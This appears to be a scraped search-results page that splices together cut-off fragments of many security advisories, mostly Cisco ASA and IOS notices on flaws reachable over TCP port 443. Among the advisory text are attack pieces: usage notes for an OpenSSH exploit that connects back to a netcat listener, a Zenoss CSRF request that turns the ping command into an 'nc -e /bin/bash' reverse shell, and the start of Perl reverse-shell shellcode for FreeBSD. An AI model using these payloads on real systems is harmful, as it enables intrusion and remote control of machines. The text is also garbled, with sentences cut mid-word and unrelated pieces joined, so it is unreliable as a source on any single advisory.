Next Page >>
port 443
Clientless WebVPN, SSL VPN Client, and AnyConnect connections are
enabled via the webvpn command. For example, the following
configuration shows a Cisco ASA with WebVPN configured and enabled.
In this case the ASA will listen for WebVPN connections on the
default port, TCP port 443:
http server enable
!
webvpn
enable outside
Additional Information
======================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - here after referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.
A successful exploit could cause the web server to crash or allow the
attacker to execute arbitrary code on the server. Any code would
execute with system administrative privileges.
The vulnerability could be exploited over TCP port 443 or 1741.
Note: The default HTTP and HTTPS ports can be reconfigured on the
server.
The vulnerability affects both CiscoWorks Common Services for Oracle
Clientless WebVPN Connections
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Clientless WebVPN connections are enabled via the "webvpn" command. For
example, the following configuration shows an ASA running 8.0 software
with clientless WebVPN configured and enabled. In this case the ASA will
listen for WebVPN connections on the default port, TCP port 443:
http server enable
!
webvpn
enable outside
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users. To successfully exploit this
vulnerability, the attacker would need the ability to submit a
crafted request to an affected device on TCP port 80, TCP port 443,
or TCP port 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
The Cisco ASA is also vulnerable when the Cut-Through Proxy for
Network Access feature is used with HTTPS. This feature is enabled
for direct authentication using HTTPS with the "aaa authentication
listener https" command, as shown in the following example:
ASA(config)# aaa authentication listener https inside port 443
Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A DoS vulnerability affects the SIP inspection feature of Cisco ASA
Cisco Response:
"Two separate Cisco IOS® Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco [...]
This response covers two separate cross-site scripting vulnerabilities
within the Cisco IOS Hypertext Transfer Protocol (HTTP) server
(including HTTP secure server - here after referred to as purely HTTP
Server) and applies to all Cisco products that run Cisco IOS Software
versions 11.0 through 12.4 with the HTTP server enabled.
};
===========
Filters such as Transit ACLs (tACLs) can be used to allow access to
the Administration Workstation from only trusted hosts.
Filters that deny HTTP packets using HTTPS packets using TCP port 443
and TCP port 1741 should be deployed throughout the network as part
of a tACL policy to protect the network from traffic that enters the
network at ingress access points. This policy should be configured to
protect the network device where the filter is applied and other
devices that are behind it. Filters for HTTPS packets that use TCP
The following workarounds can be implemented.
Transit ACLs (tACL)
+------------------
Filters that deny HTTPS packets using TCP port 443 should be deployed
throughout the network as part of a tACL policy for protection of
traffic which enters the network at ingress access points. This policy
should be configured to protect the network device where the filter is
applied and other devices behind it. Filters for HTTPS packets using
TCP port 443 should also be deployed in front of vulnerable network
following example shows a vulnerable device configured with Cisco IOS
SSLVPN:
Router# show running | section webvpn
webvpn gateway Gateway
ip address 10.1.1.1 port 443
ssl trustpoint Gateway-TP
inservice
!
Router#
>> Year 2011
>>
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
>> run like ./ssh -1 -z <yourip> <target>
>> setup a netcat, port 443 on yourip first
>>
>> a statically linked linux binary of the exploit can be found below
>> attached is a diff to openssh-5.8p2.
>>
>> the statically linked binary can be downloaded from
===========
General Considerations
+---------------------
Filters that deny HTTPS packets using TCP port 443 and MGCP packets on
UDP port 2427 should be deployed throughout the network as part of a
transit ACL (tACL) policy for protection of traffic which enters the
network at ingress access points. This policy should be configured to
protect the network device where the filter is applied and other devices
behind it. Filters for HTTPS packets using TCP port 443 and MGCP packets
Clientless VPN, SSL VPN Client, and AnyConnect connections are
enabled via the webvpn command. For example, the following
configuration shows a Cisco ASA with Clientless VPNs configured and
enabled. In this case the ASA will listen for VPN connections on the
default port, TCP port 443:
http server enable
!
webvpn
enable outside
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from
CVE-2011-4202 to this issue.
=====================================================================
Impact:
Anyone who is able to connect to Restorepoint on port 443 between powering up
the appliance and before the appliance is license activated is able to obtain
root level shell access to the appliance.
The Restorepoint appliance is used to back up the configurations of network
devices and as such, the Restorepoint appliance holds credentials for all the
hierarchy will have correct permissions. Filters such as Transit ACLs
can then be used to allow access to the Administration Workstation
from only the trusted hosts.
Filters that deny HTTP packets using TCP port 80 and HTTPS packets
using TCP port 443 should be deployed throughout the network as part
of a tACL policy for protection of traffic that enters the network at
ingress access points. This policy should be configured to protect
the network device where the filter is applied and other devices
behind it. Filters for HTTP packets using TCP port 80 and HTTPS
packets using TCP port 443 should also be deployed in front of
Multiple CGI command injection vulnerabilities exist in Cisco
TelePresence endpoint devices that could allow a remote,
authenticated attacker to execute arbitrary commands with elevated
privileges. To exploit these vulnerabilities, an attacker must submit
a malformed request to an affected device via TCP port 443.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities:
* Cisco TelePresence endpoint - CSCtb31685 ( registered customers
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit these vulnerabilities.
The specific flaws exist due to how the application passes CGI
parameters to the internal obtool binary running on port 443. Due to
improper filtering of user data a specially crafted request could lead
to arbitrary commands being executed under the credentials of the
service.
-- Vendor Response:
Cisco Secure ACS provides an optional User Change Password (UCP) web
service. Customers can implement the UCP functionality through either
a web-based front-end application or a scripting interface. In either
case, the computer that offers the UCP services to clients needs
access to TCP port 443 on the ACS server in order to perform such
password changes. Because this access would allow exploitation of the
vulnerability described in this advisory, both of the following
recommendations apply:
* Stop providing UCP services
Exploitation allows an attacker to cause a denial of service condition
or potentially execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability, an attacker must be able to
establish a session on TCP port 443 with target machine. No credentials
are required to trigger the vulnerable code path.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in IBM Tivoli
Advisory by Cisco was published a few days ago (Bugtraq ID: 48810).
Now more details:
1. Unathenticated access to web management (any user - including admin).
Due to blind SQLi in the login form of web management (port 443, https,
login field, embedded sqlite DB), there is possible to obtain:
a) all logins
b) all passwords (which are kept in the DB in plaintext)
c) other data stored in internal DB
boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
2. Change and execute a command CSRF.
Change the ping command to be a netcat shell out to a remote system. In
this case an internal system running on port 443
http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
Details
=======
The Cisco Physical Access Gateway is the primary means for the Cisco
Physical Access Control solution to connect door hardware, such as
locks and readers, to an IP network. Certain crafted TCP port 443
packets may cause a memory leak that could lead to a denial of
service (DoS) condition in the Cisco Physical Access Gateway. A TCP
three-way handshake is needed to exploit this vulnerability.
This vulnerability is documented in Cisco Bug ID CSCsu95864 and has
could allow the attacker to modify agent policies and system
configuration and perform other administrative tasks.
Note: This vulnerability can be exploited only by sending certain
packets to the web management interface, which by default listens on
TCP port 443.
This vulnerability is documented in Cisco Bug ID CSCtj51216
and has been assigned the Common Vulnerabilities and Exposures (CVE)
identifier CVE-2011-0364.
use IO::Socket;
$|=1;
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
compromise computers attached to the kvm switch.
Severity: Medium
CVE-2009-1474: Session ID Cookie not secure-only
When the user connects to the device via http on port 80, the device
redirects the user to the same device on port 443 (https). There the
user logs in and gets a session id cookie. However, this cookie does
not contain the secure option as specified in rfc2109. When the user
goes back to http for any reason, an attacker can sniff the session
id. Using this session ID it is possible to download the Windows/Java
client program (which contains authentication data) and then access
following example shows a vulnerable device configured with Cisco IOS
SSLVPN:
Router# show running | section webvpn
webvpn gateway Gateway
ip address 10.1.1.1 port 443
ssl trustpoint Gateway-TP
inservice
!
Router#
vulnerabilities before permitting access to the network. You can use
the NAC Manager server and its web-based administration console to
manage multiple NAC Appliances in a deployment.
Cisco NAC Manager contains a directory traversal vulnerability. The
management interface uses TCP port 443. An unauthenticated attacker
could exploit this vulnerability to access sensitive information,
including password files and system logs, that could be leveraged to
launch subsequent attacks. This vulnerability is documented in Cisco bug
ID CSCtq10755 and has been assigned Common Vulnerabilities and Exposures
(CVE) ID CVE-2011-3305.
not required to exploit this vulnerability but an attacker must be
authenticated.
The specific flaw exists in the handling of various variables to the
script property_box.php used in the administration server running on
port 443. Due to improper filtering of user data a specially crafted
request could lead to arbitrary commands being executed under the
credentials of the SYSTEM account.
-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
WebVPN DTLS Denial of Service Vulnerability
+------------------------------------------
Cisco ASA 5500 Series Adaptive Security Appliances are affected by a
vulnerability that may cause the appliance to reload when a malformed
DTLS message is sent to the DTLS port (by default UDP port 443).
Appliances are only vulnerable when they are configured for WebVPN and
DTLS transport.
This vulnerability is only triggered by traffic that is destined to the
appliance; transit traffic will not trigger the vulnerability.
Next Page>>
|
